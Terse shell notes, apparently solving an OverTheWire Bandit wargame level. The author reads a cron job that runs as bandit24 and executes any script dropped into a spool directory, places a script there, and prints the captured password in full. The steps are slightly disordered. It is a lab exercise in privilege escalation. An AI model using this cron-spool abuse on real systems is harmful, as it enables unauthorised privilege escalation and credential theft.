cd /etc/cron.d
ls 
-> cronjob_bandit15_root  cronjob_bandit23       e2scrub_all
cronjob_bandit17_root  cronjob_bandit24       otw-tmp-dir
cronjob_bandit22       cronjob_bandit25_root  sysstat
cat cronjob_bandit24
-> @reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
   * * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
cat /usr/bin/cronjob_bandit24.sh
-> #!/bin/bash

myname=$(whoami)

cd /var/spool/$myname/foo || exit 1
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -rf ./$i
    fi
done
cd /var/spool/bandit24
ls 
-> foo
cd foo
cd /tmp
mkdir <directory name>
cd >the directory name>
cd /var/spool/bandit24/foo
nano pass.sh
pwd 
-> /tmp/game255
cd ..
chmod 777 game255
cd game255
cp pass.sh /var/spool/bandit24/foo/
ls
-> pass.sh  password24
cat password24 
-> VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar